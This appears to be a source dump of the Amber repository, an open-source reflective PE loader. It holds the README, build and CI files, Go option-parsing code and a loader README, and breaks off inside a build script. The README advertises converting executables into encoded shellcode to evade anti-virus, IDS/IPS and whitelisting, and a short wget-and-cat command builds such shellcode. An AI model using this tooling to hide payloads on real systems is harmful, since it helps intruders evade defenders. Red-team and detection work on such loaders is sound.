├── .github
├── img
│ ├── banner.png
│ ├── loader.png
│ └── usage.gif
└── workflows
│ └── main.yml
├── .gitignore
├── .gitmodules
├── .vscode
└── launch.json
├── Dockerfile
├── LICENSE
├── Makefile
├── README.md
├── config
└── options.go
├── go.mod
├── go.sum
├── loader
├── README.md
├── loader-x64
│ ├── amber_loader-x64-lite.bin
│ ├── build.sh
│ ├── inc
│ │ ├── calc_crc.asm
│ │ ├── get_module_by_crc.asm
│ │ ├── get_proc_by_crc.asm
│ │ ├── load_module.asm
│ │ ├── map_image.asm
│ │ ├── memcpy.asm
│ │ ├── protect_sections.asm
│ │ ├── relocate_image.asm
│ │ ├── resolve_imports.asm
│ │ └── run_tls_callbacks.asm
│ ├── loader-x64-lite.asm
│ ├── loader-x64.asm
│ └── stub.c
├── loader-x86
│ ├── amber_loader-x86-lite.bin
│ ├── build.sh
│ ├── inc
│ │ ├── calc_crc.asm
│ │ ├── get_module_by_crc.asm
│ │ ├── get_proc_by_crc.asm
│ │ ├── load_module.asm
│ │ ├── map_image.asm
│ │ ├── memcpy.asm
│ │ ├── protect_sections.asm
│ │ ├── relocate_image.asm
│ │ ├── resolve_imports.asm
│ │ └── run_tls_callbacks.asm
│ ├── loader-x86-lite.asm
│ ├── loader-x86.asm
│ └── stub.c
└── syscall-loader-x64
│ ├── build.sh
│ ├── inc
│ ├── calc_crc.asm
│ ├── get_module_by_crc.asm
│ ├── get_proc_by_crc.asm
│ ├── load_module.asm
│ ├── map_image.asm
│ ├── memcpy.asm
│ ├── protect_sections.asm
│ ├── relocate_image.asm
│ ├── resolve_imports.asm
│ └── run_tls_callbacks.asm
│ ├── stub.c
│ └── syscall-loader-x64.asm
├── main.go
├── pkg
├── amber.go
└── static.go
├── stub
├── Makefile
├── Resource.rc
├── amber.ico
└── stub.c
└── utils
└── helpers.go
/.github/img/banner.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/.github/img/banner.png
--------------------------------------------------------------------------------
/.github/img/loader.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/.github/img/loader.png
--------------------------------------------------------------------------------
/.github/img/usage.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/.github/img/usage.gif
--------------------------------------------------------------------------------
/.github/workflows/main.yml:
--------------------------------------------------------------------------------
1 |
2 | name: build
3 |
4 | on:
5 | push:
6 | branches: [ "master" ]
7 |
8 | jobs:
9 | linux-build:
10 | runs-on: ubuntu-latest
11 | steps:
12 | - uses: actions/checkout@v3
13 | - name: Set up Go
14 | uses: actions/setup-go@v3
15 | with:
16 | go-version: 1.19
17 | - name: Install Keystone
18 | run: ./install-keystone.sh
19 | - name: Build for Linux
20 | run: make
21 | - name: 'Upload Artifact'
22 | uses: actions/upload-artifact@v3
23 | with:
24 | name: amber_linux
25 | path: amber
26 | retention-days: 5
27 | macos-run:
28 | runs-on: macos-latest
29 | steps:
30 | - uses: actions/checkout@v3
31 | - name: Set up Go
32 | uses: actions/setup-go@v3
33 | with:
34 | go-version: 1.19
35 | - name: Install Keystone
36 | run: ./install-keystone.sh
37 | - name: Build for MacOS
38 | run: make
39 | - name: 'Upload Artifact'
40 | uses: actions/upload-artifact@v3
41 | with:
42 | name: amber_darwin
43 | path: amber
44 | retention-days: 5
45 |
46 | windows-build:
47 | runs-on: windows-latest
48 | steps:
49 | - uses: actions/checkout@v3
50 | - name: Set up Go
51 | uses: actions/setup-go@v3
52 | with:
53 | go-version: 1.19
54 | - name: Build for Windows
55 | run: make
56 | - name: 'Upload Artifact'
57 | uses: actions/upload-artifact@v3
58 | with:
59 | name: amber.exe
60 | path: amber.exe
61 | retention-days: 5
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Created by .ignore support plugin (hsz.mobi)
2 | ### Go template
3 | # Binaries for programs and plugins
4 | *.exe
5 | *.exe~
6 | *.dll
7 | *.so
8 | *.dylib
9 | *.txt
10 |
11 | # Test binary, built with `go test -c`
12 | *.test
13 |
14 | # Output of the go coverage tool, specifically when used with LiteIDE
15 | *.out
16 |
17 | # Dependency directories (remove the comment below to include it)
18 | # vendor/
19 |
20 | .idea
21 |
22 | # vscode debug configs
23 | .vscode
24 | .vscode/*
25 |
26 | # BUILDS
27 | build
28 | stub/*.exe
29 | amber
30 |
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "CRC32_API"]
2 | path = loader/CRC32_API
3 | url = git://github.com/EgeBalci/CRC32_API.git
4 |
5 | [submodule "IAT_API"]
6 | path = loader/IAT_API
7 | url = git://github.com/EgeBalci/IAT_API.git
8 |
--------------------------------------------------------------------------------
/.vscode/launch.json:
--------------------------------------------------------------------------------
1 | {
2 | // Use IntelliSense to learn about possible attributes.
3 | // Hover to view descriptions of existing attributes.
4 | // For more information, visit: https://go.microsoft.com/fwlink/?linkid=830387
5 | "version": "0.2.0",
6 | "configurations": [
7 | {
8 | "name": "Launch",
9 | "type": "go",
10 | "request": "launch",
11 | "mode": "auto",
12 | "program": "${fileDirname}",
13 | "env": {},
14 | "args": ["-f","/tmp/putty.exe"]
15 | }
16 | ]
17 | }
--------------------------------------------------------------------------------
/Dockerfile:
--------------------------------------------------------------------------------
1 | FROM golang:1.20 as builder
2 |
3 | RUN apt-get update && apt-get -y install \
4 | build-essential \
5 | cmake \
6 | g++-multilib \
7 | gcc-multilib \
8 | git \
9 | libcapstone-dev \
10 | python3 \
11 | time
12 | WORKDIR /root/
13 | RUN git clone https://github.com/EgeBalci/keystone
14 | RUN mkdir keystone/build
15 | WORKDIR /root/keystone/build
16 |
17 | RUN ../make-lib.sh
18 | RUN cmake -DCMAKE_BUILD_TYPE=Release -DBUILD_SHARED_LIBS=OFF -DLLVM_TARGETS_TO_BUILD="AArch64;X86" -G "Unix Makefiles" ..
19 | RUN make -j8
20 | RUN make install && ldconfig
21 |
22 | # RUN mkdir /root/amber
23 | WORKDIR /root
24 | RUN git clone https://github.com/egebalci/amber
25 | WORKDIR /root/amber
26 | RUN go build -trimpath -buildvcs=false -ldflags="-extldflags=-static -s -w" -o /root/bin/amber main.go
27 |
28 | FROM scratch
29 | COPY --from=builder /root/bin/amber /amber
30 | ENTRYPOINT ["/amber"]
31 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | MIT License
2 |
3 | Copyright (c) 2017 Ege Balcı
4 |
5 | Permission is hereby granted, free of charge, to any person obtaining a copy
6 | of this software and associated documentation files (the "Software"), to deal
7 | in the Software without restriction, including without limitation the rights
8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 |
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 |
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 |
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | BUILD=go build
2 | BUILD_FLAGS=-trimpath -buildvcs=false -ldflags="-extldflags=-static -s -w -X github.com/egebalci/amber/config.Version=$$(git log --pretty=format:'v1.0.%at-%h' -n 1)"
3 |
4 | default:
5 | ${BUILD} ${BUILD_FLAGS} -o amber
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | 
4 |
5 |
6 | 
7 |
8 |
9 | 
10 |
11 |
12 | 
13 |
14 |
15 | 
16 |
17 |
18 | 
19 |
20 |
21 |
22 | # Inroduction
23 |
24 | Amber is a position-independent(reflective) PE loader that enables in-memory execution of native PE files(EXE, DLL, SYS...). It enables stealthy in-memory payload deployment that can be used to bypass anti-virus, firewall, IDS, IPS products, and application white-listing mitigations. Reflective payloads generated by Amber can either be staged from a remote server or executed directly in memory much like a generic shellcode. By default, every generated payload is encoded using the new generation [SGN encoder](https://github.com/EgeBalci/sgn). Amber uses [CRC32_API](https://github.com/EgeBalci/crc32_api) and [IAT_API](https://github.com/EgeBalci/iat_api) for inconspicuously resolving the Windows API function addresses. After the PE file is loaded and executed in memory, the reflective payload is erased for evading memory scanners.
25 |
26 | # Installation
27 | Pre-compiled binaries can be found under [releases](https://github.com/EgeBalci/amber/releases).
28 |
29 | ***Building From Source***
30 |
31 | The only dependency for building the source is the [keystone engine](https://github.com/keystone-engine/keystone), follow [these](https://github.com/keystone-engine/keystone/blob/master/docs/COMPILE.md) instructions for installing the library. Once libkeystone is installed on the system, simply just go get it ツ
32 |
33 | ```
34 | go install github.com/EgeBalci/amber@latest
35 | ```
36 |
37 | ***Docker Install***
38 |
39 | [](https://hub.docker.com/r/egee/amber/)
40 |
41 | ```
42 | docker pull egee/amber
43 | docker run -it egee/amber
44 | ```
45 |
46 | # Usage
47 |
48 |
49 | 
50 |
51 |
52 | The following table lists switches supported by the amber.
53 |
54 |
55 |
56 | | Switch |
57 | Type |
58 | Description |
59 |
60 |
61 |
62 | | -f,--file |
63 | string |
64 | Input PE file. |
65 |
66 |
67 |
68 | | -o,--out |
69 | string |
70 | Output binary payload file name. |
71 |
72 |
73 |
74 | | -e |
75 | int |
76 | Number of times to encode the generated reflective payload |
77 |
78 |
79 |
80 | | --iat |
81 | bool |
82 | Use IAT API resolver block instead of CRC API resolver block |
83 |
84 |
85 |
86 | | -l |
87 | int |
88 | Maximum number of bytes for obfuscation (default 5) |
89 |
90 |
91 |
92 | | --sys |
93 | bool |
94 | Perform raw syscalls. (only x64) |
95 |
96 |
97 |
98 | | --scrape |
99 | bool |
100 | Scrape magic byte and DOS stub from PE. |
101 |
102 |
103 |
104 |
105 |
106 | **Example Usage**
107 |
108 | - Generate reflective payload.
109 | ```
110 | amber -f test.exe
111 | ```
112 | - Generate reflective payload with IAT API resolver and encode the final payload 10 times.
113 | ```
114 | amber -e 10 --iat -f test.exe
115 | ```
116 |
117 | ***Docker Usage***
118 | ```
119 | docker run -it -v /tmp/:/tmp/ amber -f /tmp/file.exe
120 | ```
121 |
122 | # Demo
123 |
124 | - [NOPcon 2018 DEMO](https://www.youtube.com/watch?v=lCPdKSH6RMc)
125 | - [Pentest.blog - Deploying Reflective PE Files With Metasploit](https://www.youtube.com/watch?v=3en0ftnjEpE)
126 | - [Pentest.blog - Deploying Reflective Ransomware POC](https://www.youtube.com/watch?v=JVv_spX6D4U)
--------------------------------------------------------------------------------
/config/options.go:
--------------------------------------------------------------------------------
1 | package config
2 |
3 | import (
4 | "fmt"
5 | "os"
6 |
7 | "github.com/EgeBalci/amber/utils"
8 | "github.com/alecthomas/kong"
9 | )
10 |
11 | const Version = "3.2.0"
12 |
13 | func HelpPrompt(options kong.HelpOptions, ctx *kong.Context) error {
14 | err := kong.DefaultHelpPrinter(options, ctx)
15 | if err != nil {
16 | return err
17 | }
18 | return nil
19 | }
20 |
21 | // Main config struct for parsing the TOML file
22 | type Config struct {
23 | FileName string `help:"Input PE file name." name:"file" short:"f"`
24 | OutputFile string `help:"Output binary payload file name." name:"out" short:"o"`
25 | EncodeCount int `help:"Number of times to encode the generated reflective payload." name:"encode" short:"e" default:"1"`
26 | ObfuscationLimit int `help:"Maximum number of bytes for encoder obfuscation." name:"obfuscate-limit" short:"l" default:"5"`
27 | UseIAT bool `help:"Use IAT API resolver block instead of CRC API resolver block." name:"iat"`
28 | UseSyscalls bool `help:"Perform raw syscalls. (only x64)" name:"sys"`
29 | ScrapePeHeaders bool `help:"Scrape magic byte and DOS stub from PE." name:"scrape"`
30 | // IgnoreIntegrity bool `help:"Ignore PE file integrity check errors." name:"ignore"`
31 | Verbose bool `help:"Verbose mode." name:"verbose" short:"v"`
32 | Version kong.VersionFlag
33 | }
34 |
35 | // ConfigureOptions accepts a flag set and augments it with agentgo-server
36 | // specific flags. On success, an options structure is returned configured
37 | // based on the selected flags.
38 | func Parse() (*Config, error) {
39 |
40 | cfg := new(Config)
41 | parser, err := kong.New(
42 | cfg,
43 | kong.Help(HelpPrompt),
44 | kong.UsageOnError(),
45 | kong.Vars{"version": Version},
46 | kong.ConfigureHelp(kong.HelpOptions{
47 | Summary: true,
48 | }),
49 | )
50 | if err != nil {
51 | return nil, err
52 | }
53 | _, err = parser.Parse(os.Args[1:])
54 | if err != nil {
55 | return nil, err
56 | }
57 |
58 | if cfg.FileName == "" {
59 | utils.PrintErr("no file specified! (-f )\n")
60 | kong.Help(HelpPrompt)
61 | os.Exit(1)
62 | }
63 |
64 | if cfg.OutputFile == "" {
65 | cfg.OutputFile = fmt.Sprintf("%s.bin", cfg.FileName)
66 | }
67 |
68 | return cfg, nil
69 | }
70 |
71 | func (cfg *Config) PrintSummary() {
72 | utils.PrintStatus("File: %s\n", cfg.FileName)
73 | utils.PrintStatus("Encode Count: %d\n", cfg.EncodeCount)
74 | utils.PrintStatus("Obfuscation Limit: %d\n", cfg.ObfuscationLimit)
75 | if cfg.UseIAT {
76 | utils.PrintStatus("API Resolver: IAT\n")
77 | } else {
78 | utils.PrintStatus("API Resolver: CRC\n")
79 | }
80 | if cfg.UseSyscalls {
81 | utils.PrintStatus("Raw Syscalls: True\n")
82 | }
83 | }
84 |
--------------------------------------------------------------------------------
/go.mod:
--------------------------------------------------------------------------------
1 | module github.com/EgeBalci/amber
2 |
3 | go 1.15
4 |
5 | require (
6 | github.com/EgeBalci/debug v0.0.0-20201116162432-d79a6eb18848
7 | github.com/EgeBalci/sgn v0.0.0-20231219142414-258f3083dba2
8 | github.com/alecthomas/kong v0.8.1
9 | github.com/briandowns/spinner v1.23.0
10 | github.com/fatih/color v1.16.0
11 | github.com/mattn/go-runewidth v0.0.15 // indirect
12 | github.com/olekukonko/tablewriter v0.0.5 // indirect
13 | github.com/rivo/uniseg v0.4.7 // indirect
14 | github.com/sirupsen/logrus v1.9.0
15 | golang.org/x/sys v0.17.0 // indirect
16 | golang.org/x/term v0.17.0 // indirect
17 | )
18 |
--------------------------------------------------------------------------------
/go.sum:
--------------------------------------------------------------------------------
1 | github.com/EgeBalci/debug v0.0.0-20201116162432-d79a6eb18848 h1:xp+mcTlDdvF6gCe/eSkaDmpQ4Kd7zUAPLZxPfqNjvWA=
2 | github.com/EgeBalci/debug v0.0.0-20201116162432-d79a6eb18848/go.mod h1:7fXlZBJFFub/8MYzeBI6HFwNkwL2cw8pe3yrWTJduwc=
3 | github.com/EgeBalci/keystone-go v0.0.0-20200525180613-e6c7cd32ceae h1:IMOEVXYMrzHg+1oWgTYBEwzMGsxFHUgoreu2Ic62K7Q=
4 | github.com/EgeBalci/keystone-go v0.0.0-20200525180613-e6c7cd32ceae/go.mod h1:/HCfOmUN3INldcXC0YnFrOtOw3MuRFEQ9cKTT5fZuQ8=
5 | github.com/EgeBalci/sgn v0.0.0-20201126033925-686e60d127dc h1:OVYO6tY6ivMDvT/np+bKnkUSIgHRJ4S7hAGcd1ylas8=
6 | github.com/EgeBalci/sgn v0.0.0-20201126033925-686e60d127dc/go.mod h1:gI4nYEhbKmf35Q+NPyoX+o1ajkCgabjYjsyu19tmfgM=
7 | github.com/EgeBalci/sgn v0.0.0-20231219142414-258f3083dba2 h1:v0YrXqe3w4KGVUH5D/MxBhIQH16nZ5yBZ+zTC8KI2Nk=
8 | github.com/EgeBalci/sgn v0.0.0-20231219142414-258f3083dba2/go.mod h1:NROZGYB3DOyRBNWm7joLs64Zdu3MOBybtmxepm/D2Tc=
9 | github.com/alecthomas/assert/v2 v2.1.0 h1:tbredtNcQnoSd3QBhQWI7QZ3XHOVkw1Moklp2ojoH/0=
10 | github.com/alecthomas/assert/v2 v2.1.0/go.mod h1:b/+1DI2Q6NckYi+3mXyH3wFb8qG37K/DuK80n7WefXA=
11 | github.com/alecthomas/kong v0.7.1 h1:azoTh0IOfwlAX3qN9sHWTxACE2oV8Bg2gAwBsMwDQY4=
12 | github.com/alecthomas/kong v0.7.1/go.mod h1:n1iCIO2xS46oE8ZfYCNDqdR0b0wZNrXAIAqro/2132U=
13 | github.com/alecthomas/kong v0.8.1 h1:acZdn3m4lLRobeh3Zi2S2EpnXTd1mOL6U7xVml+vfkY=
14 | github.com/alecthomas/kong v0.8.1/go.mod h1:n1iCIO2xS46oE8ZfYCNDqdR0b0wZNrXAIAqro/2132U=
15 | github.com/alecthomas/repr v0.1.0 h1:ENn2e1+J3k09gyj2shc0dHr/yjaWSHRlrJ4DPMevDqE=
16 | github.com/alecthomas/repr v0.1.0/go.mod h1:2kn6fqh/zIyPLmm3ugklbEi5hg5wS435eygvNfaDQL8=
17 | github.com/briandowns/spinner v1.11.1 h1:OixPqDEcX3juo5AjQZAnFPbeUA0jvkp2qzB5gOZJ/L0=
18 | github.com/briandowns/spinner v1.11.1/go.mod h1:QOuQk7x+EaDASo80FEXwlwiA+j/PPIcX3FScO+3/ZPQ=
19 | github.com/briandowns/spinner v1.23.0 h1:alDF2guRWqa/FOZZYWjlMIx2L6H0wyewPxo/CH4Pt2A=
20 | github.com/briandowns/spinner v1.23.0/go.mod h1:rPG4gmXeN3wQV/TsAY4w8lPdIM6RX3yqeBQJSrbXjuE=
21 | github.com/coreos/go-systemd/v22 v22.5.0/go.mod h1:Y58oyj3AT4RCenI/lSvhwexgC+NSVTIJ3seZv2GcEnc=
22 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
23 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
24 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
25 | github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4=
26 | github.com/fatih/color v1.10.0 h1:s36xzo75JdqLaaWoiEHk767eHiwo0598uUxyfiPkDsg=
27 | github.com/fatih/color v1.10.0/go.mod h1:ELkj/draVOlAH/xkhN6mQ50Qd0MPOk5AAr3maGEBuJM=
28 | github.com/fatih/color v1.16.0 h1:zmkK9Ngbjj+K0yRhTVONQh1p/HknKYSlNT+vZCzyokM=
29 | github.com/fatih/color v1.16.0/go.mod h1:fL2Sau1YI5c0pdGEVCbKQbLXB6edEj1ZgiY4NijnWvE=
30 | github.com/godbus/dbus/v5 v5.0.4/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA=
31 | github.com/hexops/gotextdiff v1.0.3 h1:gitA9+qJrrTCsiCl7+kh75nPqQt1cx4ZkudSTLoUqJM=
32 | github.com/hexops/gotextdiff v1.0.3/go.mod h1:pSWU5MAI3yDq+fZBTazCSJysOMbxWL1BSow5/V2vxeg=
33 | github.com/mattn/go-colorable v0.1.2/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
34 | github.com/mattn/go-colorable v0.1.8 h1:c1ghPdyEDarC70ftn0y+A/Ee++9zz8ljHG1b13eJ0s8=
35 | github.com/mattn/go-colorable v0.1.8/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc=
36 | github.com/mattn/go-colorable v0.1.13 h1:fFA4WZxdEF4tXPZVKMLwD8oUnCTTo08duU7wxecdEvA=
37 | github.com/mattn/go-colorable v0.1.13/go.mod h1:7S9/ev0klgBDR4GtXTXX8a3vIGJpMovkB8vQcUbaXHg=
38 | github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s=
39 | github.com/mattn/go-isatty v0.0.12 h1:wuysRhFDzyxgEmMf5xjvJ2M9dZoWAXNNr5LSBS7uHXY=
40 | github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU=
41 | github.com/mattn/go-isatty v0.0.16/go.mod h1:kYGgaQfpe5nmfYZH+SKPsOc2e4SrIfOl2e/yFXSvRLM=
42 | github.com/mattn/go-isatty v0.0.19/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
43 | github.com/mattn/go-isatty v0.0.20 h1:xfD0iDuEKnDkl03q4limB+vH+GxLEtL/jb4xVJSWWEY=
44 | github.com/mattn/go-isatty v0.0.20/go.mod h1:W+V8PltTTMOvKvAeJH7IuucS94S2C6jfK/D7dTCTo3Y=
45 | github.com/mattn/go-runewidth v0.0.7 h1:Ei8KR0497xHyKJPAv59M1dkC+rOZCMBJ+t3fZ+twI54=
46 | github.com/mattn/go-runewidth v0.0.7/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI=
47 | github.com/mattn/go-runewidth v0.0.9/go.mod h1:H031xJmbD/WCDINGzjvQ9THkh0rPKHF+m2gUSrubnMI=
48 | github.com/mattn/go-runewidth v0.0.15 h1:UNAjwbU9l54TA3KzvqLGxwWjHmMgBUVhBiTjelZgg3U=
49 | github.com/mattn/go-runewidth v0.0.15/go.mod h1:Jdepj2loyihRzMpdS35Xk/zdY8IAYHsh153qUoGf23w=
50 | github.com/olekukonko/tablewriter v0.0.4 h1:vHD/YYe1Wolo78koG299f7V/VAS08c6IpCLn+Ejf/w8=
51 | github.com/olekukonko/tablewriter v0.0.4/go.mod h1:zq6QwlOf5SlnkVbMSr5EoBv3636FWnp+qbPhuoO21uA=
52 | github.com/olekukonko/tablewriter v0.0.5 h1:P2Ga83D34wi1o9J6Wh1mRuqd4mF/x/lgBS7N7AbDhec=
53 | github.com/olekukonko/tablewriter v0.0.5/go.mod h1:hPp6KlRPjbx+hW8ykQs1w3UBbZlj6HuIJcUGPhkA7kY=
54 | github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0=
55 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM=
56 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
57 | github.com/rivo/uniseg v0.2.0/go.mod h1:J6wj4VEh+S6ZtnVlnTBMWIodfgj8LQOQFoIToxlJtxc=
58 | github.com/rivo/uniseg v0.4.7 h1:WUdvkW8uEhrYfLC4ZzdpI2ztxP1I582+49Oc5Mq64VQ=
59 | github.com/rivo/uniseg v0.4.7/go.mod h1:FN3SvrM+Zdj16jyLfmOkMNblXMcoc8DfTHruCPUcx88=
60 | github.com/rs/xid v1.5.0/go.mod h1:trrq9SKmegXys3aeAKXMUTdJsYXVwGY3RLcfgqegfbg=
61 | github.com/rs/zerolog v1.31.0/go.mod h1:/7mN4D5sKwJLZQ2b/znpjC3/GQWY/xaDXUM0kKWRHss=
62 | github.com/sirupsen/logrus v1.9.0 h1:trlNQbNUG3OdDrDil03MCb1H2o9nJ1x4/5LYw7byDE0=
63 | github.com/sirupsen/logrus v1.9.0/go.mod h1:naHLuLoDiP4jHNo9R0sCBMtWGeIprob74mVsIT4qYEQ=
64 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
65 | github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY=
66 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
67 | golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
68 | golang.org/x/sys v0.0.0-20200116001909-b77594299b42/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
69 | golang.org/x/sys v0.0.0-20200223170610-d5e6a3e2c0ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
70 | golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
71 | golang.org/x/sys v0.0.0-20220715151400-c0bba94af5f8/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
72 | golang.org/x/sys v0.0.0-20220811171246-fbc7d0a398ab/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
73 | golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
74 | golang.org/x/sys v0.7.0 h1:3jlCCIQZPdOYu1h8BkNvLz8Kgwtae2cagcG/VamtZRU=
75 | golang.org/x/sys v0.7.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
76 | golang.org/x/sys v0.12.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
77 | golang.org/x/sys v0.14.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
78 | golang.org/x/sys v0.15.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
79 | golang.org/x/sys v0.17.0 h1:25cE3gD+tdBA7lp7QfhuV+rJiE9YXTcS3VG1SqssI/Y=
80 | golang.org/x/sys v0.17.0/go.mod h1:/VUhepiaJMQUp4+oa/7Zr1D23ma6VTLIYjOOTFZPUcA=
81 | golang.org/x/term v0.1.0/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8=
82 | golang.org/x/term v0.17.0 h1:mkTF7LCd6WGJNL3K1Ad7kwxNfYAW6a8a8QqtMblp/4U=
83 | golang.org/x/term v0.17.0/go.mod h1:lLRBjIVuehSbZlaOtGMbcMncT+aqLLLmKrsjNrUguwk=
84 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM=
85 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
86 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c h1:dUUwHk2QECo/6vqA44rthZ8ie2QXMNeKRTHCNY2nXvo=
87 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=
88 |
--------------------------------------------------------------------------------
/loader/README.md:
--------------------------------------------------------------------------------
1 | # Amber Loader v3.0
2 |
3 | Amber Loader is a reflective PE loader designed for manually loading (mapping, relocating, and resolving) and executing PE files from memory. It is written fully in assembly using the NASM syntax. The loader supports both 32- and 64-bit PE files with TLS callbacks and forwarded imports.
4 |
5 |
6 |
7 | 
8 |
9 |
10 | The lite version of the amber loader can be directly appended in front of a PE file for converting the file into a shellcode.
11 |
12 |
13 | - [amber_loader-x86-lite.bin](https://github.com/EgeBalci/amber/raw/master/loader/loader-x86/amber_loader-x86-lite.bin)
14 | - [amber_loader-x64-lite.bin](https://github.com/EgeBalci/amber/raw/master/loader/loader-x64/amber_loader-x64-lite.bin)
15 |
16 | ### Example: Converting putty.exe into shellcode
17 | ```bash
18 | wget https://github.com/EgeBalci/amber/raw/master/loader/loader-x64/amber_loader-x64-lite.bin -O shellcode
19 | cat putty.exe >> shellcode && xxd -i shellcode
20 | ```
21 | **(!! lite version do not wipe itself from the memory !!)**
--------------------------------------------------------------------------------
/loader/loader-x64/amber_loader-x64-lite.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/EgeBalci/amber/f6eb2dc4b4b1a408d23ad376b16ac0c9a7b4c54d/loader/loader-x64/amber_loader-x64-lite.bin
--------------------------------------------------------------------------------
/loader/loader-x64/build.sh:
--------------------------------------------------------------------------------
1 | #!/bin/bash
2 | ## ANSI Colors (FG & BG)
3 | RED="$(printf '\033[31m')" GREEN="$(printf '\033[32m')" YELLOW="$(printf '\033[33m')" BLUE="$(printf '\033[34m')"
4 | MAGENTA="$(printf '\033[35m')" CYAN="$(printf '\033[36m')" WHITE="$(printf '\033[37m')" BLACK="$(printf '\033[30m')"
5 | REDBG="$(printf '\033[41m')" GREENBG="$(printf '\033[42m')" YELLOWBG="$(printf '\033[43m')" BLUEBG="$(printf '\033[44m')"
6 | MAGENTABG="$(printf '\033[45m')" CYANBG="$(printf '\033[46m')" WHITEBG="$(printf '\033[47m')" BLACKBG="$(printf '\033[40m')"
7 | RESET="$(printf '\e[0m')"
8 |
9 | print_warning() {
10 | echo ${YELLOW}"[!] ${RESET}${1}"
11 | }
12 | print_error() {
13 | echo "${RED}[-] ${RESET}${1}"
14 | }
15 | print_fatal() {
